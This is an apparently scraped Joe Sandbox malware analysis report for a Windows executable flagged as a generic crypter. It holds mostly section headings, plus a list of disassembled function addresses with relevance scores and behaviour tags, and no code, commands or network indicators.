Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exePID: 7376, Parent PID: 2580

General

Chronological Activities

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Function 010989B0 Relevance: 214.1, APIs: 79, Strings: 43, Instructions: 626
stringmemoryfileCOMMON

Function 00151300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Function 00151710 Relevance: .1, Instructions: 103
COMMON

Function 00153C30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40
timeCOMMON

Function 010991D0 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Function 01096D30 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Function 01095FB0 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Function 01097900 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 265
memoryCOMMON

Function 010993B0 Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 192
libraryloadermemoryCOMMON

Function 010972C0 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 154
stringCOMMON

Function 01095C50 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 277
injectionthreadprocessCOMMON

Function 010980E0 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Function 01096810 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 229
memorynetworkfileCOMMON

Function 00153670 Relevance: 42.4, APIs: 4, Strings: 20, Instructions: 354
COMMON